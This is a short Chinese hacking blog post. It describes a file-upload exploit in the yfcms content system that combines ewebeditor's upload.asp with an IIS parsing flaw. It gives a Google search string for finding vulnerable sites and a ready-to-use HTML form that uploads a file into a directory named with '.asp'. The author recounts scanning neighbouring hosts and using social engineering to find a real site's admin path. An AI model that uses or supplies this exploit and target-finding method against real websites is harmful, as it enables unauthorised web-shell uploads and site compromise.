刚刚C段的时候,遇到了个程序,一看网上有公开的源码,下了,看之,有个很大的漏洞。
漏洞是利用ewebeditor的上传结合IIS解析漏洞
FROM HTTP://WWW.ST999.CN/BLOG BY 流浪的风
google关键字:intext:版权所有:yfcms
利用文件:admin\WebEditor\asp\upload.asp
利用代码:
<form action="http://www.st999.cn/admin/WebEditor\asp\upload.asp?action=save&type=image&style=popup&cusdir=st999.asp" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=upload>
</form>
这里有个前提 ,要知道网站的后台目录才行。
我刚搞的那个站,不是默认的后台,扫了半天也没扫出来,结果还是社出来的。
